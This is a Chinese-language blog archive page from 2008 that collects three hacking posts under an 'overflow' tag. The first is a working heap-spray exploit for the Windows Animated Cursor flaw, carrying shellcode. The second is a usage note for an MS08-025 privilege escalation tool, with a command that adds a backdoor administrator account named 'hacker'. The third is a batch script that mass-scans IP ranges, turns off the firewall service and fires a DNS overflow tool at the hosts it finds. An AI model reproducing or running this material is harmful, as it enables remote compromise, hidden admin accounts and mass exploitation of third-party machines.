存档

文章标签 ‘溢出’

Vista 光标远程溢出源代码

2008年7月23日 没有评论

from:搁浅's Blog

<br />..::&#91; geqian presents &#93;::..<br /><br />Windows Animated Cursor Handling Exploit (0day)<br /><br />Works on fully patched Windows Vista<br />I think it is first real remote code execution exploit on vista =)<br /><br />Tested on:<br />Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled)<br />Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled)<br />Windows XP SP2<br />(It also must to work on all nt based windows but not tested)<br /><br />Author: geqian<br />Mail: 70527418@vip.qq.com<br /><br />Bug discovered by determina (http://www.aground.cn/)<br /><br />Credit: geqian, http://www.aground.cn/<br /><br />invokes calc.exe if successful<br /><br />--><br /><br /><SCRIPT language="javascript"><br />var heapSprayToAddress = 0x07000000;<br /><br />var payLoadCode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");<br /><br />var heapBlockSize = 0x400000;<br /><br />var payLoadSize = payLoadCode.length * 2;<br /><br />var spraySlideSize = heapBlockSize - (payLoadSize+0x38);<br /><br />var spraySlide = unescape("%u4141%u4141");<br />spraySlide = getSpraySlide(spraySlide,spraySlideSize);<br /><br />heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;<br /><br />memory = new Array();<br /><br />for (i=0;i<heapBlocks;i++)<br />{<br />memory&#91;i&#93; = spraySlide + payLoadCode;<br />}<br /><br />document.write("<HTML><BODY style=&#92;"CURSOR: url($1$riff.htm$1$)&#92;"> </BODY></HTML>")<br />wait(500)<br />window.location.reload()<br /><br />function getSpraySlide(spraySlide, spraySlideSize)<br />{<br />while (spraySlide.length*2<spraySlideSize)<br />{<br />spraySlide += spraySlide;<br />}<br />spraySlide = spraySlide.substring(0,spraySlideSize/2);<br />return spraySlide;<br />}<br /></SCRIPT>
分类: 网络安全 标签: ,

MS08025

2008年4月21日 没有评论

注:前天在哪见过了,没收集,发上来,不在我机器上时用下!
真正可用的MS08025。
为了多次运行,服务器蓝屏,请直接用一次运行所有的命令
比如:
        MS08025 “cmd.exe /c net user hacker hacker /add & net localgroup administrators hacker /add”
        Local Privilege Escalation Vulnerability Exploit(MS08025)
        Modify by [F.S.T] For 姬良
        Run paltform: Windows 2k,xp,2k3,vista
ImageName: \WINDOWS\system32\ntkrnlpa.exe     阅读全文…

分类: 工具收集 标签: ,

DNS批量溢出批处理代码

2008年3月27日 没有评论
<br />@shift 1<br />@ setlocal<br />@ cls<br />@ color A<br />@ title DNS批量溢出个人版<br />@echo =========================================<br />@echo DNS批量溢出个人版<br />@echo BY Amxking<br />@echo 1.输入您想溢出的IP段 格式:XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX <br />@echo=========================================<br />@ set /p input=1.输入您想溢出的IP段:<br />@ echo %input%>>ip.txt<br />@ net stop sharedaccess<br />@ net start server<br />@echo ========================================<br />@set /p c=请选择扫描方式: (1为TCP,2为syn):<br />@if "%c%"=="2" goto syn<br />@if "%c%"=="1" goto tcp<br /><br />:syn<br />@for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do %MYFILES%&#92;s syn %%i %%j 53 /save<br />@ goto ip<br /><br />:tcp<br /> @for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do %MYFILES%&#92;s tcp %%i %%j 53 1000 /save<br /><br />@ goto ip<br /><br />:ip<br /> @for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt<br /> @for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt<br /> @for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>s.txt<br /><br />@del ip.txt<br />@del s1.txt<br />@del s2.txt<br />@del Result.txt<br />@echo============================================<br />@echo 等待溢出…………当出现类似203.80.19.6 1077 :Vulnerability OS:window 2003<br />@echo 为可以溢出的IP 203.80.19.6 为IP 1077为端口 2003 为系统类型<br />@echo 请把能溢出的保存为boot.txt 保存格式:IP 端口 系统 例如 58.34.125.200 1029 2003<br />@echo============================================<br />@ FOR /F "eol= tokens=1 delims= " %%i in (s.txt) do %MYFILES%&#92;dns -s %%i >>a.txt<br />@echo============================================<br />@echo 请把能溢出的保存为boot.txt 保存格式:IP 端口 系统 例如 58.34.125.200 1029 2003<br />@echo============================================<br />@pause<br /><br />@ for /F "eol= tokens=1,2 delims= " %%i in (boot.txt) do %MYFILES%&#92;dns -t2000all %%i %%j<br /><br />@for /F "eol= tokens=1,2 delims= " %%i in (boot.txt) do %MYFILES%&#92;dns -t2003eng %%i %%j<br /> @goto yichu<br />:yichu<br />@for /F "eol=s tokens=1 delims= " %%i in (boot.txt) do echo telnet %%i 1100>>3.txt<br />@for /F "eol= tokens=1 delims=" %%i in (3.txt) do echo %%i>>%%i.bat<br />@del s.txt<br />@del a.txt<br />@del 3.txt<br /><br />@echo============================================<br />@echo 运行生成的批处理 等待溢出…………<br />@echo============================================<br />@pause<br />
分类: V.B.T 标签: , , ,